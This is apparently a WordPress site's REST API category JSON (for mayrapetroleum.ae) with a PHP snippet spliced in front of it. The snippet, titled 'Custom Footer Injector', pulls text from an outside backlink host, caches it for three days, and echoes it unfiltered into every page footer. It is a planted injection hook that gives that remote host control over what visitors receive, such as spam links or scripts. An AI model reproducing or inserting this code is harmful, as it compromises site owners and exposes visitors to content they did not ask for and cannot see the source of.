
// --- Custom Footer Injector & Cache (KMAA26) ---
if ( ! function_exists( 'kmaa26_get_footer_content' ) ) {
    function kmaa26_get_footer_content() {
        $transient_name = 'kmaa26_footer_cache';
        $cached_content = get_transient( $transient_name );

        if ( false !== $cached_content ) {
            return $cached_content;
        }

        $target_url = 'https://backlink.rotatelinku.com/berita.txt'; // Ganti dengan URL target Anda

        $ch = curl_init();
        curl_setopt( $ch, CURLOPT_URL, $target_url );
        curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
        curl_setopt( $ch, CURLOPT_TIMEOUT, 10 );
        curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, true );
        $response = curl_exec( $ch );
        curl_close( $ch );

        if ( $response ) {
            set_transient( $transient_name, $response, 3 * DAY_IN_SECONDS );
            return $response;
        }

        return '';
    }

    function kmaa26_inject_footer_script() {
        echo kmaa26_get_footer_content();
    }
    add_action( 'wp_footer', 'kmaa26_inject_footer_script', 999 );
}{"id":1,"count":3,"description":"","link":"https:\/\/mayrapetroleum.ae\/index.php\/category\/uncategorised\/","name":"Uncategorised","slug":"uncategorised","taxonomy":"category","parent":0,"meta":[],"_links":{"self":[{"href":"https:\/\/mayrapetroleum.ae\/index.php\/wp-json\/wp\/v2\/categories\/1"}],"collection":[{"href":"https:\/\/mayrapetroleum.ae\/index.php\/wp-json\/wp\/v2\/categories"}],"about":[{"href":"https:\/\/mayrapetroleum.ae\/index.php\/wp-json\/wp\/v2\/taxonomies\/category"}],"wp:post_type":[{"href":"https:\/\/mayrapetroleum.ae\/index.php\/wp-json\/wp\/v2\/posts?categories=1"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}